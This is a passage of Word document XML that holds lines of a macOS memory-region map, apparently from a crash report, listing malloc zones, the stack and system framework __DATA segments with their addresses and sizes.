        <w:t>MALLOC_TINY            00007fbdb1f00000-00007fbdb2000000 [ 1024K] rw-/rwx SM=COW  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdb2000000-00007fbdb2800000 [ 8192K] rw-/rwx SM=COW  GFXMallocZone_0x10a062000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL           00007fbdb2800000-00007fbdb4800000 [ 32.0M] rw-/rwx SM=COW  QuartzCore_0x10dff9000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_TINY            00007fbdb4800000-00007fbdb4d00000 [ 5120K] rw-/rwx SM=PRV  MallocHelperZone_0x10a020000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_TINY (empty)    00007fbdb4d00000-00007fbdb4e00000 [ 1024K] rw-/rwx SM=COW  QuartzCore_0x10dff9000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Stack                  00007fff55548000-00007fff55d48000 [ 8192K] rw-/rwx SM=PRV  thread 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd5df3000-00007fffd5e4e000 [  364K] rw-/rwx SM=COW  /System/Library/CoreServices/RawCamera.bundle/Contents/MacOS/RawCamera</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd6927000-00007fffd69aa000 [  524K] rw-/rwx SM=COW  /System/Library/Frameworks/AVFoundation.framework/Versions/A/AVFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd69aa000-00007fffd69ba000 [   64K] rw-/rwx SM=COW  /System/Library/Frameworks/AVFoundation.framework/Versions/A/Frameworks/AVFAudio.framework/Versions/A/AVFAudio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd69e0000-00007fffd69ef000 [   60K] rw-/rwx SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vImage.framework/Versions/A/vImage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffd69ef000-00007fffd69f1000 [    8K] rw-/rwx SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libBLAS.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd69f1000-00007fffd69f2000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libBNNS.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd69f2000-00007fffd69f7000 [   20K] rw-/rwx SM=COW  ...em/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libLAPACK.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd69f7000-00007fffd69f8000 [    4K] rw-/rwx SM=COW  ...ary/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libLinearAlgebra.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd69f8000-00007fffd69f9000 [    4K] rw-/rwx SM=COW  ...ibrary/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libQuadrature.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd69f9000-00007fffd69fa000 [    4K] rw-/rwx SM=COW  ...ibrary/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libSparseBLAS.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd69fa000-00007fffd69fb000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvDSP.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd69fb000-00007fffd69fc000 [    4K] rw-/rwx SM=COW  ...tem/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvMisc.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd69fc000-00007fffd6a0b000 [   60K] rw-/rwx SM=COW  /System/Library/Frameworks/Accounts.framework/Versions/A/Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd6a0b000-00007fffd6b16000 [ 1068K] rw-/rwx SM=COW  /System/Library/Frameworks/AddressBook.framework/Versions/A/AddressBook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffd6b16000-00007fffd6e12000 [ 3056K] rw-/rwx SM=COW  /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd6e17000-00007fffd6e1f000 [   32K] rw-/rwx SM=COW  /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/ATS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd6e27000-00007fffd6e6a000 [  268K] rw-/rwx SM=COW  ...s/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libFontParser.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd6e6a000-00007fffd6e74000 [   40K] rw-/rwx SM=COW  ...ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libFontRegistry.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd6e7d000-00007fffd6e7e000 [    4K] rw-/rwx SM=COW  ...plicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libTrueTypeScaler.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd6e84000-00007fffd6e91000 [   52K] rw-/rwx SM=COW  ...rary/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ColorSync.framework/Versions/A/ColorSync</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd6e91000-00007fffd6e9a000 [   36K] rw-/rwx SM=COW  ...ry/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/HIServices.framework/Versions/A/HIServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd6e9a000-00007fffd6e9c000 [    8K] rw-/rwx SM=COW  ...rameworks/ApplicationServices.framework/Versions/A/Frameworks/LangAnalysis.framework/Versions/A/LangAnalysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd6e9c000-00007fffd6ea3000 [   28K] rw-/rwx SM=COW  ...rary/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/PrintCore.framework/Versions/A/PrintCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd6ea3000-00007fffd6ea5000 [    8K] rw-/rwx SM=COW  /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/QD.framework/Versions/A/QD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffd6ea5000-00007fffd6ea8000 [   12K] rw-/rwx SM=COW  ...rks/ApplicationServices.framework/Versions/A/Frameworks/SpeechSynthesis.framework/Versions/A/SpeechSynthesis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd6ea8000-00007fffd6ed0000 [  160K] rw-/rwx SM=COW  /System/Library/Frameworks/AudioToolbox.framework/Versions/A/AudioToolbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd6f61000-00007fffd7071000 [ 1088K] rw-/rwx SM=COW  /System/Library/Frameworks/CFNetwork.framework/Versions/A/CFNetwork</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7079000-00007fffd707a000 [    4K] rw-/rwx SM=COW  ...tem/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/CommonPanels.framework/Versions/A/CommonPanels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd707a000-00007fffd70c7000 [  308K] rw-/rwx SM=COW  /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd70c7000-00007fffd70c8000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/Help.framework/Versions/A/Help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd70c8000-00007fffd70cc000 [   16K] rw-/rwx SM=COW  ...tem/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/ImageCapture.framework/Versions/A/ImageCapture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd70cc000-00007fffd70dc000 [   64K] rw-/rwx SM=COW  /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/Ink.framework/Versions/A/Ink</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd70dc000-00007fffd70e0000 [   16K] rw-/rwx SM=COW  ...m/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/OpenScripting.framework/Versions/A/OpenScripting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd70e0000-00007fffd70e1000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/Print.framework/Versions/A/Print</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffd70e1000-00007fffd70e2000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/SecurityHI.framework/Versions/A/SecurityHI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd70e2000-00007fffd70e3000 [    4K] rw-/rwx SM=COW  ...y/Frameworks/Carbon.framework/Versions/A/Frameworks/SpeechRecognition.framework/Versions/A/SpeechRecognition</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd70e3000-00007fffd712b000 [  288K] rw-/rwx SM=COW  /System/Library/Frameworks/CloudKit.framework/Versions/A/CloudKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd71c1000-00007fffd71c4000 [   12K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd71c4000-00007fffd71cb000 [   28K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreBluetooth.framework/Versions/A/CoreBluetooth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd71cb000-00007fffd7248000 [  500K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreData.framework/Versions/A/CoreData</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7248000-00007fffd724f000 [   28K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreDisplay.framework/Versions/A/CoreDisplay</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd724f000-00007fffd7398000 [ 1316K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7398000-00007fffd73dd000 [  276K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd73dd000-00007fffd748d000 [  704K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreImage.framework/Versions/A/CoreImage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd748d000-00007fffd749b000 [   56K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreLocation.framework/Versions/A/CoreLocation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd749b000-00007fffd74af000 [   80K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreMedia.framework/Versions/A/CoreMedia</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffd74af000-00007fffd74b4000 [   20K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreMediaIO.framework/Versions/A/CoreMediaIO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd74b4000-00007fffd74b9000 [   20K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/AE.framework/Versions/A/AE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd74b9000-00007fffd74ce000 [   84K] rw-/rwx SM=COW  ...m/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/CarbonCore.framework/Versions/A/CarbonCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd74ce000-00007fffd74d6000 [   32K] rw-/rwx SM=COW  ...orks/CoreServices.framework/Versions/A/Frameworks/DictionaryServices.framework/Versions/A/DictionaryServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd74d6000-00007fffd74d7000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/FSEvents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd74d7000-00007fffd750f000 [  224K] rw-/rwx SM=COW  ...y/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/LaunchServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd750f000-00007fffd7540000 [  196K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/Metadata.framework/Versions/A/Metadata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7540000-00007fffd754d000 [   52K] rw-/rwx SM=COW  ...m/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/OSServices.framework/Versions/A/OSServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd754d000-00007fffd7558000 [   44K] rw-/rwx SM=COW  ...tem/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/SearchKit.framework/Versions/A/SearchKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7558000-00007fffd7563000 [   44K] rw-/rwx SM=COW  ...y/Frameworks/CoreServices.framework/Versions/A/Frameworks/SharedFileList.framework/Versions/A/SharedFileList</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffd7579000-00007fffd759d000 [  144K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreText.framework/Versions/A/CoreText</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd759d000-00007fffd75a3000 [   24K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreVideo.framework/Versions/A/CoreVideo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd75a3000-00007fffd75bd000 [  104K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreWLAN.framework/Versions/A/CoreWLAN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd75cc000-00007fffd75cd000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/DirectoryService.framework/Versions/A/DirectoryService</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd75cd000-00007fffd75e4000 [   92K] rw-/rwx SM=COW  /System/Library/Frameworks/DiscRecording.framework/Versions/A/DiscRecording</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd75e4000-00007fffd75e6000 [    8K] rw-/rwx SM=COW  /System/Library/Frameworks/DiskArbitration.framework/Versions/A/DiskArbitration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd764f000-00007fffd7753000 [ 1040K] rw-/rwx SM=COW  /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7762000-00007fffd7768000 [   24K] rw-/rwx SM=COW  /System/Library/Frameworks/GSS.framework/Versions/A/GSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd778c000-00007fffd77b3000 [  156K] rw-/rwx SM=COW  /System/Library/Frameworks/IOBluetooth.framework/Versions/A/IOBluetooth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd77b3000-00007fffd77bd000 [   40K] rw-/rwx SM=COW  /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd77bd000-00007fffd77bf000 [    8K] rw-/rwx SM=COW  /System/Library/Frameworks/IOSurface.framework/Versions/A/IOSurface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd77bf000-00007fffd77da000 [  108K] rw-/rwx SM=COW  /System/Library/Frameworks/ImageCaptureCore.framework/Versions/A/ImageCaptureCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd77da000-00007fffd77f6000 [  112K] rw-/rwx SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/ImageIO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffd77f6000-00007fffd77f7000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libGIF.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd77f7000-00007fffd77fb000 [   16K] rw-/rwx SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJP2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd77fb000-00007fffd77fc000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJPEG.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd77fc000-00007fffd77fd000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libPng.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd77fd000-00007fffd77fe000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libRadiance.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd77fe000-00007fffd7802000 [   16K] rw-/rwx SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libTIFF.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd786f000-00007fffd78b3000 [  272K] rw-/rwx SM=COW  /System/Library/Frameworks/JavaScriptCore.framework/Versions/A/JavaScriptCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd78b3000-00007fffd78b5000 [    8K] rw-/rwx SM=COW  /System/Library/Frameworks/Kerberos.framework/Versions/A/Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd78b5000-00007fffd78b7000 [    8K] rw-/rwx SM=COW  /System/Library/Frameworks/LDAP.framework/Versions/A/LDAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd793f000-00007fffd7940000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/MediaAccessibility.framework/Versions/A/MediaAccessibility</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7947000-00007fffd79cb000 [  528K] rw-/rwx SM=COW  /System/Library/Frameworks/MediaToolbox.framework/Versions/A/MediaToolbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffd79cb000-00007fffd79f1000 [  152K] rw-/rwx SM=COW  /System/Library/Frameworks/Metal.framework/Versions/A/Metal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7a41000-00007fffd7a42000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/NetFS.framework/Versions/A/NetFS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7ab3000-00007fffd7ab4000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenCL.framework/Versions/A/Libraries/libcldcpuengine.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7ab4000-00007fffd7adf000 [  172K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenCL.framework/Versions/A/Libraries/ImageFormats/unorm8_bgra.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd7b0a000-00007fffd7b16000 [   48K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenCL.framework/Versions/A/OpenCL</w:t>
      </w:r>
    </w:p>
